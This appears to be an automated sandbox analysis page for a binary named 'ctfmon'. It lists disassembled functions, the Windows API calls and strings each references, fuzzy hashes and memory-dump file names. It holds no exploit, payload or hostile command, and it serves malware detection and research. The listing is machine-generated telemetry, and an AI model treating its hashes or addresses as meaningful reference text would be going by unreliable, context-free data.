Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: Prop$Window$ClassLongNameUnicodelstrcmpi
String ID: edit
API String ID: 4088303749-2167791130
Opcode ID: 1597239a4afc941c1085c894db732b3d1dba95b61e2187320e04733356a35fc6
Instruction ID: 0ff93033a9c459ba712771479cdbba0860af532220081132ab32d03344424365
Opcode Fuzzy Hash: 1597239a4afc941c1085c894db732b3d1dba95b61e2187320e04733356a35fc6
Instruction Fuzzy Hash: B721816A2015267A9360BB789C40FFF229CAE5EB44B405421FD14C1250F728DA8B8BBD

Function 0041F6F0 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 52libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(KERNEL32.DLL,?), ref: 0041F704
GetProcAddress.KERNEL32(00000000,DisableThreadLibraryCalls), ref: 0041F710
EnterCriticalSection.KERNEL32(00540EE0), ref: 0041F72C
GetVersion.KERNEL32 ref: 0041F73E
GetSystemMetrics.USER32(00000007), ref: 0041F782
GetSystemMetrics.USER32(00000008), ref: 0041F78C
GetSystemMetrics.USER32(00000004), ref: 0041F796
GetSystemMetrics.USER32(0000001E), ref: 0041F79F
LeaveCriticalSection.KERNEL32(00540EE0), ref: 0041F7AB

Strings

KERNEL32.DLL, xrefs: 0041F6FF
DisableThreadLibraryCalls, xrefs: 0041F70A

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: MetricsSystem$CriticalSection$AddressEnterHandleLeaveModuleProcVersion
String ID: DisableThreadLibraryCalls$KERNEL32.DLL
API String ID: 1414939872-3863293605
Opcode ID: e3aa8b7d68d2a924411618861676c163313d584acc5e2ea4edb0b14968c04ba3
Instruction ID: 1b76817333bc6af864855b7e5f9623894a9456d6f1598ca0c8fea5307d477cc5
Opcode Fuzzy Hash: e3aa8b7d68d2a924411618861676c163313d584acc5e2ea4edb0b14968c04ba3
Instruction Fuzzy Hash: 31112078950315AAD720AB60AC496CE3F60FF05348F50543AEA00972F0D779848EDF8E

Function 00412330 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,00000100,0042F1F8,00000001,00000000,00000000,7622E860,0053FD88,?,?,?,00416871,?,?,?,00000000), ref: 00412372
LCMapStringA.KERNEL32(00000000,00000100,0042F1F4,00000001,00000000,00000000,?,?,00416871,?,?,?,00000000,00000001), ref: 0041238E
LCMapStringA.KERNEL32(?,?,?,qhA,?,?,7622E860,0053FD88,?,?,?,00416871,?,?,?,00000000), ref: 004123D7
MultiByteToWideChar.KERNEL32(?,?,?,qhA,00000000,00000000,7622E860,0053FD88,?,?,?,00416871,?,?,?,00000000), ref: 0041240F
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,?,00416871,?,?,?,00000000,00000001), ref: 00412467
LCMapStringW.KERNEL32(?,?,?,00000000,00000000,00000000,?,?,00416871,?,?,?,00000000,00000001), ref: 0041247D
LCMapStringW.KERNEL32(?,?,?,00000000,?,?,?,?,00416871,?,?,?,00000000,00000001), ref: 004124B0
LCMapStringW.KERNEL32(?,?,?,?,?,00000000,?,?,00416871,?,?,?,00000000,00000001), ref: 00412518

Strings

qhA, xrefs: 004123FA, 0041245C, 004123CB, 004123AB

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: String$ByteCharMultiWide
String ID: qhA
API String ID: 352835431-109923292
Opcode ID: 9b5ad6b26a613f15ee88acef6ac07d595746195d4a2bcaefb84c6f805b6936c2
Instruction ID: 022544586a59cc1c19d10a42de7e4e70b0ca33dfdf838dda5653db0c0489c209
Opcode Fuzzy Hash: 9b5ad6b26a613f15ee88acef6ac07d595746195d4a2bcaefb84c6f805b6936c2
Instruction Fuzzy Hash: 28517E31A00209FFCF218F54DE45EEF7BB5FB49750F50412AF914A1260D37989A1DB69

Function 0041F070 Relevance: 16.7, APIs: 11, Instructions: 199COMMON

Download Yara Rule

APIs

GetPropA.USER32(?,?), ref: 0041F0B4
CallWindowProcA.USER32(00000000), ref: 0041F0D9

Part of subcall function 0041C470: CallWindowProcA.USER32(00000000,?,?,?,?), ref: 0041C496
Part of subcall function 0041C470: RemovePropA.USER32(?,?), ref: 0041C4AE
Part of subcall function 0041C470: RemovePropA.USER32(?,?), ref: 0041C4BA

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: Prop$CallProcRemoveWindow
String ID:
API String ID: 2276450057-0
Opcode ID: 5a95a9b41c8fc2d37364fe1a2b04355123226dd158324cccf79beebb18d5b243
Instruction ID: f1e4040e56493d437ac46db905cae456868ac3245465abe7b0ffa80cda6678ad
Opcode Fuzzy Hash: 5a95a9b41c8fc2d37364fe1a2b04355123226dd158324cccf79beebb18d5b243
Instruction Fuzzy Hash: ED518076A04200BFD220EB55DCC4DBFB7B8EBC9715F54442EF94583251E239AC8A87A6

Function 0041F400 Relevance: 16.6, APIs: 11, Instructions: 140windowCOMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000F0), ref: 0041F40E
GetClientRect.USER32(?,?), ref: 0041F429
SendMessageA.USER32(?,00000031,00000000,00000000), ref: 0041F45B
SelectObject.GDI32(?,00000000), ref: 0041F469
SetBkMode.GDI32(?,00000002), ref: 0041F47A
GetParent.USER32(?), ref: 0041F488
SendMessageA.USER32(00000000), ref: 0041F48F
SelectObject.GDI32(?,00000000), ref: 0041F499
SelectObject.GDI32(?,00000000), ref: 0041F4BB
SelectObject.GDI32(?,00000000), ref: 0041F4CB
OffsetRect.USER32(?,000000FF,000000FF), ref: 0041F522

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: ObjectSelect$MessageRectSend$ClientLongModeOffsetParentWindow
String ID:
API String ID: 3606012576-0
Opcode ID: f7fa03efbb0a66176dc49cc41372e7cbe411cfa1cfd8160426a7a43753d65c69
Instruction ID: e1acb393bdb105ea5047fdd93fdf0929f10e42051cf65a82c9b5611acde4adff
Opcode Fuzzy Hash: f7fa03efbb0a66176dc49cc41372e7cbe411cfa1cfd8160426a7a43753d65c69
Instruction Fuzzy Hash: 72413F722443017BD210AB58AC86FBF736CEBC5B14F84053DF70196192D759E90B87BA

Function 0041CB71 Relevance: 16.6, APIs: 11, Instructions: 107COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000FC), ref: 0041CB8D
RemovePropA.USER32(?,?), ref: 0041CBC3
SetWindowLongA.USER32(?,000000FC,00000000), ref: 0041CBC9
RemovePropA.USER32(?,?), ref: 0041CBF7
SetWindowLongA.USER32(?,000000FC,00000000), ref: 0041CBFD
GetWindow.USER32(?,00000005), ref: 0041CC52
GetWindow.USER32(00000000,00000002), ref: 0041CC63

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: Window$Long$PropRemove
String ID:
API String ID: 3256693057-0
Opcode ID: 36df50be8ca3e0aa6a92018f1b9fdc3f7e6f4b5b25b034851e1aae027e5d082a
Instruction ID: 793464c1ab96f3f28d4b13fd69ea8cc3b37c752f7a31a6ea227274fee3499300
Opcode Fuzzy Hash: 36df50be8ca3e0aa6a92018f1b9fdc3f7e6f4b5b25b034851e1aae027e5d082a
Instruction Fuzzy Hash: 7821067A2440257AC3216778BC80DFF228CDB9A368B110136FA04D2290FB29ECC747BD

Function 00405772 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 231memoryCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00405777
MapDialogRect.USER32(?,?), ref: 004057FD
SysAllocStringLen.OLEAUT32(?,00000000), ref: 0040581E
CLSIDFromString.OLE32(0000FFFC,?), ref: 00405909
CLSIDFromProgID.OLE32(0000FFFC,?), ref: 00405911
SetWindowPos.USER32(00000004,?,00000000,00000000,00000000,00000000,00000013,00000001,00000000,?,00000000,?,?,?,0000FC84,00000000), ref: 004059AD
SysFreeString.OLEAUT32(?), ref: 00405A00

Strings

`DvP?Dv, xrefs: 00405A00

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: String$From$AllocDialogFreeH_prologProgRectWindow
String ID: `DvP?Dv
API String ID: 493809305-2995021381
Opcode ID: 76058ddd35c64321db0c5c4c9e8bc567c32fe2d22cfa7dfe102f258be5c60066
Instruction ID: ddfec87cd7aa1e3dc79061aa66cd0129ae2a5a4b187d7cfc1545594e6d37e31f
Opcode Fuzzy Hash: 76058ddd35c64321db0c5c4c9e8bc567c32fe2d22cfa7dfe102f258be5c60066
Instruction Fuzzy Hash: F3A1197190061ADFCB10DFA9D984AEEBBB4FF08304F14813EE815A7290D7749A55CFA9

Function 00415C71 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 143COMMON

Download Yara Rule

APIs

GetStringTypeW.KERNEL32(00000001,0042F1F8,00000001,@,?,?,?,0040EBEE,?,00000008,00407093,?), ref: 00415CB0
GetStringTypeA.KERNEL32(00000000,00000001,0042F1F4,00000001,@,?,?,?,0040EBEE,?,00000008,00407093,?), ref: 00415CCA
GetStringTypeW.KERNEL32(00000100,?,00407093,00000008,?,?,?,0040EBEE,?,00000008,00407093,?), ref: 00415CF1
WideCharToMultiByte.KERNEL32(?,00000220,?,00407093,00000000,00000000,00000000,00000000,?,?,?,0040EBEE,?,00000008,00407093,?), ref: 00415D24
WideCharToMultiByte.KERNEL32(?,00000220,?,00407093,00000000,00000000,00000000,00000000,?,?,?,0040EBEE,?,00000008,00407093,?), ref: 00415D8D
GetStringTypeA.KERNEL32(@,00000100,?,?,?,?,?,?,0040EBEE,?,00000008,00407093,?), ref: 00415DF8

Strings

@, xrefs: 00415DCD, 00415DF7
@, xrefs: 00415CA2, 00415CBE, 00415CA5, 00415CC1

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: StringType$ByteCharMultiWide
String ID: @$@
API String ID: 3852931651-2930932199
Opcode ID: 637b9a2027f8d11f9ba14c48296acc9abc446613b4d653ebd54a83bfefdd23d3
Instruction ID: 1c15a09582e329dc3b7eb93bde5ac744ef8d040035c95133badfe14c744ef744
Opcode Fuzzy Hash: 637b9a2027f8d11f9ba14c48296acc9abc446613b4d653ebd54a83bfefdd23d3
Instruction Fuzzy Hash: 64519231D00709EBCF219F95DC46AEF7FB4FB89750F20452AF410A6290D3749991DBA8

Function 0040AE0A Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040AE0F
VariantClear.OLEAUT32(?), ref: 0040AEB4
SysFreeString.OLEAUT32(00000000), ref: 0040AF35
SysFreeString.OLEAUT32(00000000), ref: 0040AF44
SysFreeString.OLEAUT32(00000000), ref: 0040AF53
VariantClear.OLEAUT32(?), ref: 0040AF5D
VariantClear.OLEAUT32(?), ref: 0040AF6E

Part of subcall function 0040A633: __EH_prolog.LIBCMT ref: 0040A638
Part of subcall function 0040A633: VariantClear.OLEAUT32(00000007), ref: 0040AB8C
Part of subcall function 0040A633: VariantClear.OLEAUT32(?), ref: 0040AD99

Part of subcall function 0040CE35: VariantCopy.OLEAUT32(?,?), ref: 0040CE3D

Strings

`DvP?Dv, xrefs: 0040AF35, 0040AF44, 0040AF53

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: Variant$Clear$FreeString$H_prolog$Copy
String ID: `DvP?Dv
API String ID: 3345578691-2995021381
Opcode ID: 527a1c3fc3581c05ebe35c4305d89dfccdc4838b1892ceeab9f248ec18f835ab
Instruction ID: 7a1db6359f3125c85e1e53df7fe4f0938f48fa671959c3eaa9cad5873132af52
Opcode Fuzzy Hash: 527a1c3fc3581c05ebe35c4305d89dfccdc4838b1892ceeab9f248ec18f835ab
Instruction Fuzzy Hash: 815128B1A00309EFDB14DFA4C884BEEBBB8FF08704F10452AE115A7291D774A955CB95

Function 0040902F Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00409046
SetMapMode.GDI32(00000000,00000003), ref: 00409051
LPtoDP.GDI32(00000000,?,00000002), ref: 0040907A
__ftol.LIBCMT ref: 004090C3
__ftol.LIBCMT ref: 004090CE
DPtoLP.GDI32(00000000,?,00000002), ref: 004090DD
ReleaseDC.USER32(?,00000000), ref: 00409121

Strings

W, xrefs: 00409110

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: __ftol$ModeRelease
String ID: W
API String ID: 1379597261-655174618
Opcode ID: fa7acd1234dd63ba8f1e8afded327bb42ab26611bd1c67e31014e76cbf7f569f
Instruction ID: 8ca894d6ef4fa197229fbb959d41c86698faa0bbb9e13a2d725a5857b8f61538
Opcode Fuzzy Hash: fa7acd1234dd63ba8f1e8afded327bb42ab26611bd1c67e31014e76cbf7f569f
Instruction Fuzzy Hash: 55415D74A01209EFDB14CF98D589AEEBBB0FF44300F1584AAE855AB392C7389E50CF54

Function 0042538C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

GetStockObject.GDI32(00000011), ref: 004253A8
GetStockObject.GDI32(0000000D), ref: 004253B0
GetObjectW.GDI32(00000000,0000005C,?), ref: 004253BD
GetDC.USER32(00000000), ref: 004253CC
GetDeviceCaps.GDI32(00000000,0000005A), ref: 004253E3
MulDiv.KERNEL32(?,00000048,00000000), ref: 004253EF
ReleaseDC.USER32(00000000,00000000), ref: 004253FA

Strings

System, xrefs: 004253A1, 00425410

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: Object$Stock$CapsDeviceRelease
String ID: System
API String ID: 46613423-3470857405
Opcode ID: b5aa894935c3560286c83436582695622890635bab9a7bdb21018ccdce49e049
Instruction ID: f46f37b3d3d4612b8e83e0057ece6bda57a43c624d054bcf47829690f41a9a48
Opcode Fuzzy Hash: b5aa894935c3560286c83436582695622890635bab9a7bdb21018ccdce49e049
Instruction Fuzzy Hash: 3B117731B00728ABEB109BA59C49FAF7B68AB04795F904026FA05E71D1D7749C42C7A4

Function 004154A8 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 50libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(user32.dll,?,00000000,00000000,00410685,?,Microsoft Visual C++ Runtime Library,00012010,?,0042F07C,?,0042F0CC,?,?,?,Runtime Error!Program: ), ref: 004154BA
GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 004154D2
GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 004154E3
GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 004154F0

Strings

user32.dll, xrefs: 004154B5
GetLastActivePopup, xrefs: 004154E5
MessageBoxA, xrefs: 004154CC
GetActiveWindow, xrefs: 004154DD

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
API String ID: 2238633743-4044615076
Opcode ID: 5ab5992dddaa3f7fa0f417d9efb794b7685826fe295bf1f12a020d1beb63436b
Instruction ID: 4643cc2abfda65c973c0f230a36f017a01bddbd01039f16f24786c98e207d1fc
Opcode Fuzzy Hash: 5ab5992dddaa3f7fa0f417d9efb794b7685826fe295bf1f12a020d1beb63436b
Instruction Fuzzy Hash: 7D017571B00611EF8710AFF5ADC4D9B3BAB9AA8690354083BA504D2721DB78C88DAB34

Function 00423E07 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 42libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(COMCTL32.DLL,00000800,00000000,00000400,00424101,?,00020000), ref: 00423E10
LoadLibraryA.KERNEL32(COMCTL32.DLL), ref: 00423E19
GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00423E2D
#17.COMCTL32 ref: 00423E48
#17.COMCTL32 ref: 00423E64
FreeLibrary.KERNEL32(00000000), ref: 00423E70

Strings

InitCommonControlsEx, xrefs: 00423E25
COMCTL32.DLL, xrefs: 00423E09, 00423E0F, 00423E16

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: Library$AddressFreeHandleLoadModuleProc
String ID: COMCTL32.DLL$InitCommonControlsEx
API String ID: 1437655972-4218389149
Opcode ID: fbc2046041922bd786504a1cdf1c0074c3bd5e3fbe41aaae23bd871ef4b93d28
Instruction ID: 75276020c994f243a46c4147610413596e97131f96f2929e1f4ad0196d98a365
Opcode Fuzzy Hash: fbc2046041922bd786504a1cdf1c0074c3bd5e3fbe41aaae23bd871ef4b93d28
Instruction Fuzzy Hash: D0F08632B403229786216FE8AC8891F72A8AB947527960476F450E3210CF28ED078B7E

Function 00417B40 Relevance: 13.7, APIs: 9, Instructions: 221COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(00000000,00000000,0042F1F8,00000001,0042F1F8,00000001,00000000,-00000004,00000001,?,00414AD9,0040F5F7,00000000,?,?,0040F46A), ref: 00417B7E
CompareStringA.KERNEL32(00000000,00000000,0042F1F4,00000001,0042F1F4,00000001,?,00414AD9,0040F5F7,00000000,?,?,0040F46A,00000000), ref: 00417B9B
CompareStringA.KERNEL32(00000000,00000000,00000000,00000000,0040F46A,?,00000000,-00000004,00000001,?,00414AD9,0040F5F7,00000000,?,?,0040F46A), ref: 00417BF9
GetCPInfo.KERNEL32(?,00000000,00000000,-00000004,00000001,?,00414AD9,0040F5F7,00000000,?,?,0040F46A,00000000), ref: 00417C4A
MultiByteToWideChar.KERNEL32(?,00000009,00000000,?,00000000,00000000,?,00414AD9,0040F5F7,00000000,?,?,0040F46A,00000000), ref: 00417CC9
MultiByteToWideChar.KERNEL32(?,00000001,00000000,?,00000000,?,?,00414AD9,0040F5F7,00000000,?,?,0040F46A,00000000), ref: 00417D2A
MultiByteToWideChar.KERNEL32(?,00000009,0040F46A,?,00000000,00000000,?,00414AD9,0040F5F7,00000000,?,?,0040F46A,00000000), ref: 00417D3D
MultiByteToWideChar.KERNEL32(?,00000001,0040F46A,?,?,00000000,?,00414AD9,0040F5F7,00000000,?,?,0040F46A,00000000), ref: 00417D89
CompareStringW.KERNEL32(00000000,00000000,00000000,?,?,00000000,?,00000000,?,00414AD9,0040F5F7,00000000,?,?,0040F46A,00000000), ref: 00417DA1

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: ByteCharCompareMultiStringWide$Info
String ID:
API String ID: 1651298574-0
Opcode ID: 626c00746097870350dcb73b9ce94af668f21a0bcfd9788210486e2b273a240b
Instruction ID: 7b3f78671b9cc246bcbdba2b09b373ac3ce48b51b29b8ccc2d9feaddae2fe836
Opcode Fuzzy Hash: 626c00746097870350dcb73b9ce94af668f21a0bcfd9788210486e2b273a240b
Instruction Fuzzy Hash: FD71AF7590824AAFDF219F94EC819EF7BB5FF45344F10012BF950A2260D3398D91DBA9

Function 0040FDDE Relevance: 13.6, APIs: 9, Instructions: 147COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,0040D0BE), ref: 0040FDFC
GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,0040D0BE), ref: 0040FE10
GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,0040D0BE), ref: 0040FE31
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0040FE68
